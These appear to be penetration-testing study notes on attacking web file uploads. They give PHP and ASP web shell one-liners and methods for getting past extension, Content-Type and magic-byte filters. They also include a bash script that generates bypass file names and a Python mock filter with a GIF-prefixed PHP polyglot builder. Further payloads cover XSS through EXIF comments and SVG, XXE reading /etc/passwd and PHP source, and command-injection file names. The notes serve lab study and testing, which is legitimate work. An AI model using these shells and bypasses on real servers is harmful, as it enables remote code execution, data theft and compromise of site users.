4. File Upload
Web Shells
Resources
https://github.com/Arrexel/phpbash
https://github.com/danielmiessler/SecLists/tree/master/Web-Shells
https://github.com/pentestmonkey/php-reverse-shell
PHP one-liner (runs the command from the cmd parameter, GET or POST):
<?php system($_REQUEST['cmd']); ?>
Classic ASP (VBScript) one-liner:
<%eval request('cmd') %>
Bypass Client-Side Validation (the check runs in the browser, so it never has to pass)
1. Upload a legitimate file, intercept the request in Burp and change the file name/extension (and Content-Type) after the browser-side check has already run.
2. Or disable the check in the page itself from the browser developer tools:
1. [CTRL+SHIFT+C] --> Page Inspector: edit the <input type="file"> element (e.g. its accept attribute) or remove the onsubmit/onchange handler that calls the validation function.
2. [CTRL+SHIFT+K] --> Web Console: type the validation function's name to read its code, then override it or call the upload function directly.
Blacklist (server rejects a list of known-bad extensions; anything not on the list goes through)
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload Insecure Files/Extension PHP/extensions.lst
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload Insecure Files/Extension ASP
- https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt
- Upload a file
- Locate the uploaded file (so each fuzzed extension can be requested and its response compared)
- Fuzz the extension with the lists above: an extension must both pass the blacklist (e.g. .phtml, .phar, .php7 are often forgotten) and be executed by the web server, so check the response for executed output rather than source.
Whitelist (server allows only listed extensions, e.g. image types)
- FUZZ
- Double extensions
- shell.jpg.php: passes when the whitelist regex only checks that an allowed extension appears somewhere in the name (missing end anchor); the file still ends in .php, so the server executes it.
- Reverse Double Extension
- shell.php.jpg: passes a correctly anchored whitelist, but only executes when the web server is misconfigured to treat any file name containing .php as PHP (e.g. an Apache FilesMatch pattern without an end anchor).
- Character Injection (inserted before or after the extension to confuse the check or to truncate the name when it is stored)
%20
%0a
%00
%0d0a
/
.\
.
…
:
Bash script to generate a wordlist of candidate names (the injected character placed before or after the PHP extension, with the allowed .jpg extension in front or behind):
#!/bin/bash
# Characters to inject; single quotes keep the backslash in '.\' literal.
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
  # PHP extensions that a blacklist commonly forgets
  for ext in '.php' '.phps' '.phar' '.php7' '.pht' '.phtml' '.shtml'; do
    echo "shell$char$ext.jpg" >> wordlist.txt
    echo "shell$ext$char.jpg" >> wordlist.txt
    echo "shell.jpg$char$ext" >> wordlist.txt
    echo "shell.jpg$ext$char" >> wordlist.txt
  done
done
Type Filters
- FUZZ the Content-Type header: the server may trust the Content-Type of the multipart part, so keep the .php name and payload and try the image types from the list:
$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Miscellaneous/web/content-type.txt
$ grep 'image/' content-type.txt > image-content-types.txt
- MIME filter (magic bytes): the server reads the first bytes of the file (PHP finfo, the file tool) instead of trusting the header.
https://en.wikipedia.org/wiki/List_of_file_signatures
https://opensource.apple.com/source/file/file-23/file/magic/magic.mime
Prepend the signature of an allowed type to the payload (e.g. GIF89a for GIF, or just GIF8, which is what most sniffers match on); PHP ignores the bytes before the opening <?php tag, so the web shell still runs.
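Added example, not part of these notes: a mock of the three-part filter (extension whitelist, Content-Type header, magic bytes) that the Blacklist/Whitelist and Type Filter tricks above target. The validator, the allowed lists, the unanchored regex and the payload are all assumptions chosen to mirror common real-world mistakes; it runs offline so the effect of each candidate name and body can be checked before sending it to a target.

```python
# Added example (not from the original notes): mock server-side upload filter.
# Everything here is an assumption modelled on common weak validators.
import re
from typing import Optional

# First bytes that MIME sniffers (PHP finfo, the `file` tool) key on.
# Subset of https://en.wikipedia.org/wiki/List_of_file_signatures
MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}

ALLOWED_TYPES = {"image/jpeg", "image/png", "image/gif"}

# Weak but common extension whitelist: no end anchor, so an allowed
# extension only has to appear *somewhere* in the file name.
UNANCHORED_EXT = re.compile(r"\.(jpe?g|png|gif)", re.IGNORECASE)

# The PHP one-liner from these notes, as bytes.
PHP_PAYLOAD = b"<?php system($_REQUEST['cmd']); ?>"


def sniff_mime(data: bytes) -> Optional[str]:
    """Return the MIME type implied by the leading bytes, or None."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def make_polyglot(payload: bytes, magic: bytes = b"GIF89a") -> bytes:
    """Prepend an image signature so magic-byte checks classify the body as an
    image. PHP ignores everything before the first <?php tag, so the shell still
    executes if the file is handed to the PHP handler."""
    return magic + b"\n" + payload


def weak_validate(filename: str, content_type: str, data: bytes) -> bool:
    """Typical filter: extension whitelist, Content-Type header, magic bytes.
    Each part is individually bypassable with the techniques in these notes."""
    if not UNANCHORED_EXT.search(filename):
        return False
    if content_type not in ALLOWED_TYPES:
        return False
    if sniff_mime(data) not in ALLOWED_TYPES:
        return False
    return True


def candidates_that_pass(names, content_type: str = "image/gif"):
    """Filter a wordlist of candidate names against the mock validator, using a
    GIF-prefixed PHP body and a spoofed Content-Type for every upload."""
    body = make_polyglot(PHP_PAYLOAD)
    return [n for n in names if weak_validate(n, content_type, body)]


if __name__ == "__main__":
    names = ["shell.php", "shell.jpg.php", "shell.php.jpg", "shell.php%00.jpg"]
    print(candidates_that_pass(names))
```

Only shell.jpg.php is useful on a correctly configured server, since it still ends in .php; the others pass the filter but depend on a misconfigured handler or on null-byte truncation when the name is stored.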
Limited File Uploads (only images or documents are accepted, but the upload still carries attacker-controlled data)
Stored XSS via metadata
For web applications that display image metadata (e.g. the EXIF Comment field), write the payload into the comment:
$ exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
$ exiftool HTB.jpg    (verify the comment was written)
XSS via Scalable Vector Graphics (SVG)
SVG is an XML-based image format describing 2D vector graphics that the browser renders; because it is XML it can carry a <script> element, which runs when the SVG is opened directly (not when it is embedded via <img>).
Create the SVG as XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
<script type="text/javascript">alert(window.origin);</script>
</svg>
XXE
What is XXE?
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
# on a PHP server, read source code (which would be executed rather than returned if requested directly) via the php://filter wrapper, base64-encoded so PHP tags do not break the XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
Injections in File Name
If the file name is passed to a shell command (e.g. mv, or an image conversion tool) it may be evaluated as a command; if it is reflected in the page it may trigger XSS. e.g.
file$(whoami).jpg
file`whoami`.jpg
file.jpg||whoami
<script>alert(window.origin);</script>
Upload Directory Disclosure
Find where uploads are stored: read the page source for the image URL, fuzz common directory names (e.g. /uploads, /images), or provoke error messages (upload a name that already exists, or an overly long name) that may reveal the full path.
Windows-Specific Attacks
https://en.wikipedia.org/wiki/8.3_filename
8.3 short names: on NTFS every long file name also has a legacy short alias (first six characters, ~1, three-character extension), so a request for WEB~1.CON can refer to web.config, and a filter that only inspects the full name can be sidestepped by using the short one.
Common image Content-Type values (for the type-filter fuzzing above):
image/jpeg
image/png
image/svg+xml